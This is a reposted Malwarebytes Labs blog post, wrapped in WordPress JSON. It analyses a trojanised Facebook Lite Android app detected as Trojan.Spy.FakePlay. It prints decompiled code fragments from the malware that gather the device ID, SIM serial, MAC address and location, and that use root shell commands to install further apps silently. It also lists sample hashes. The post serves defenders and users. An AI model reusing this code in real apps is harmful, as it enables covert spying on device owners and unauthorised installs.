{"id":6868,"date":"2017-03-06T09:12:16","date_gmt":"2017-03-06T17:12:16","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/03\/06\/news-659\/"},"modified":"2017-03-06T09:12:16","modified_gmt":"2017-03-06T17:12:16","slug":"news-659","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/03\/06\/news-659\/","title":{"rendered":"Mobile Menace Monday: Facebook Lite infected with Spy FakePlay"},"content":{"rendered":"<p><strong>Credit to Author: Nathan Collier| Date: Mon, 06 Mar 2017 16:00:28 +0000<\/strong><\/p>\n<p>A version of the popular mobile app Facebook has been found to be infected with what we detect as Android\/Trojan.Spy.FakePlay. \u00a0Facebook Lite is a more compact version of the popular app that uses less data and claims to work in all network conditions (i.e. where network conditions are poor).<\/p>\n<p align=\"center\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-16443\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/02\/1-338x600.png\" alt=\"\" width=\"338\" height=\"600\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/02\/1-338x600.png 338w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/02\/1-169x300.png 169w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/02\/1.png 720w\" sizes=\"auto, (max-width: 338px) 100vw, 338px\" \/><\/p>\n<p>The infected Facebook Lite works as advertised, but with the addition of malicious activities. It does this by using a malicious <a href=\"https:\/\/developer.android.com\/guide\/topics\/manifest\/receiver-element.html\" target=\"_blank\">receiver<\/a> <em>com.google.update.LaunchReceiver<\/em> and <a href=\"https:\/\/developer.android.com\/guide\/topics\/manifest\/service-element.html\" target=\"_blank\">service<\/a> <em>com.google.update.GetInst<\/em>.\u00a0 Note the use of using a receiver and service name that attempts to hide under what some may think is <em>Google Update; <\/em>something an untrained eye may not catch.<\/p>\n<p>Service <em>com.google.update.LaunchReceiver<\/em> runs whenever the phone is booted, and immediately runs receiver <em>com.google.update.GetInst.<\/em><\/p>\n<p align=\"center\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-16444 size-full\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/02\/2.jpg\" width=\"1174\" height=\"72\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/02\/2.jpg 1174w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/02\/2-300x18.jpg 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/02\/2-600x37.jpg 600w\" sizes=\"auto, (max-width: 1174px) 100vw, 1174px\" \/><\/p>\n<p align=\"center\"><em>Log entry from Android Device Monitor<\/em><\/p>\n<p>Receiver <em>com.google.update.GetInst <\/em>contains the bulk of the malicious code.\u00a0 Below are some chunks of code that steal personal information, and installs additional malicious apps.<\/p>\n<p><em>Code that steals and sends device ID, System Version, MAC address, Phone Model, Location, etc<\/em>:<br \/> <code>WifiInfo localWifiInfo = ((WifiManager)getSystemService(\"wifi\")).getConnectionInfo();<br \/> <\/code><code>HashMap localHashMap = new HashMap();<\/code><br \/> <code>localHashMap.put(\"DeviceId\", paramTelephonyManager.getDeviceId());<\/code><br \/> <code>localHashMap.put(\"SystemVersion\", Build.VERSION.RELEASE);<\/code><br \/> <code>localHashMap.put(\"Mac\", localWifiInfo.getMacAddress());<\/code><br \/> <code>localHashMap.put(\"PhoneType\", Build.MODEL);<\/code><br \/> <code>localHashMap.put(\"NetworkOperatorName\", paramTelephonyManager.getNetworkOperatorName());<\/code><br \/> <code>localHashMap.put(\"SimSerialNumber\", paramTelephonyManager.getSimSerialNumber());<\/code><br \/> <code>localHashMap.put(\"Location\", a());<\/code><\/p>\n<p><em>Code to install additional apps:<\/em><br \/> <code>localProcess = Runtime.getRuntime().exec(\"su\");<\/code><br \/> <code>PrintWriter localPrintWriter = new PrintWriter(localProcess.getOutputStream());<\/code><br \/> <code>localPrintWriter.println(\"chmod 777 \" + paramString);<\/code><br \/> <code>localPrintWriter.println(\"export LD_LIBRARY_PATH=\/vendor\/lib:\/system\/lib\");<\/code><br \/> <code>localPrintWriter.println(\"pm install -r\u00a0 \" + paramString);<\/code><br \/> <code>localPrintWriter.flush();<\/code><br \/> <code>localPrintWriter.close();<\/code><\/p>\n<p>The literal meaning of <a href=\"any%20malicious%20computer%20program%20which%20is%20used%20to%20hack%20into%20a%20computer%20by%20misleading%20users%20of%20its%20true%20intent.\" target=\"_blank\">Trojan<\/a> when it comes to computing is quote from Wikipedia <em>any malicious computer program which is used to hack into a computer by misleading users of its true intent<\/em>.\u00a0 This particular piece of mobile malware is a perfect example; it misleads by infecting a legit app with malicious code and then hides its presence under the name of well-known corporation.<\/p>\n<p>This infected version of Facebook Lite originates from China based on characters found in the code. China does not have access to Google Play\u00a0and relies on third party apps stores that sometimes contain malicious apps like this.\u00a0 If you in a country that has access to Google Play, we suggest using it over third party apps stores to avoid such infections.\u00a0 Stay safe out there!<\/p>\n<p>Malicious MD5 samples:<br \/> 5345429AB24BB132CFAACE51EFF63C84<br \/> 628235E3C56651C72326D8F5C713DBC6<\/p>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/cybercrime\/2017\/03\/mobile-menace-monday-facebook-lite-infected-with-spy-fakeplay\/\">Mobile Menace Monday: Facebook Lite infected with Spy FakePlay<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/cybercrime\/2017\/03\/mobile-menace-monday-facebook-lite-infected-with-spy-fakeplay\/\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Nathan Collier| Date: Mon, 06 Mar 2017 16:00:28 +0000<\/strong><\/p>\n<table cellpadding='10'>\n<tr>\n<td valign='top' align='center'><a href='https:\/\/blog.malwarebytes.com\/cybercrime\/2017\/03\/mobile-menace-monday-facebook-lite-infected-with-spy-fakeplay\/' title='Mobile Menace Monday: Facebook Lite infected with Spy FakePlay'><img src='https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/02\/Featured_Pic-Copy-640x480.jpg' border='0'  width='300px'  \/><\/a><\/td>\n<\/tr>\n<tr>\n<td valign='top' align='left'>A lite version of the popular mobile app Facebook has been infected with Android\/Trojan.Spy.FakePlay.<\/p>\n<p>Categories: <\/p>\n<ul class=\"post-categories\">\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/cybercrime\/\" rel=\"category tag\">Cybercrime<\/a><\/li>\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/cybercrime\/mobile\/\" rel=\"category tag\">Mobile<\/a><\/li>\n<\/ul>\n<p>Tags: <a href=\"https:\/\/blog.malwarebytes.com\/tag\/android\/\" rel=\"tag\">Android<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/facebook\/\" rel=\"tag\">facebook<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/facebook-lite\/\" rel=\"tag\">Facebook Lite<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/google\/\" rel=\"tag\">Google<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/mobile\/\" rel=\"tag\">Mobile<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/mobile-menace-monday\/\" rel=\"tag\">mobile menace monday<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/triple-m\/\" rel=\"tag\">triple m<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/trojan\/\" rel=\"tag\">trojan<\/a><\/p>\n<table width='100%'>\n<tr>\n<td align=right>\n<p><b>(<a href='https:\/\/blog.malwarebytes.com\/cybercrime\/2017\/03\/mobile-menace-monday-facebook-lite-infected-with-spy-fakeplay\/' title='Mobile Menace Monday: Facebook Lite infected with Spy FakePlay'>Read more&#8230;<\/a>)<\/b><\/p>\n<\/td>\n<\/tr>\n<\/table>\n<\/td>\n<\/tr>\n<\/table>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/cybercrime\/2017\/03\/mobile-menace-monday-facebook-lite-infected-with-spy-fakeplay\/\">Mobile Menace Monday: Facebook Lite infected with Spy FakePlay<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[10462,4503,3589,11529,1670,10554,10555,10556,10833],"class_list":["post-6868","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-android","tag-cybercrime","tag-facebook","tag-facebook-lite","tag-google","tag-mobile","tag-mobile-menace-monday","tag-triple-m","tag-trojan"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6868","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=6868"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6868\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=6868"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=6868"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=6868"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}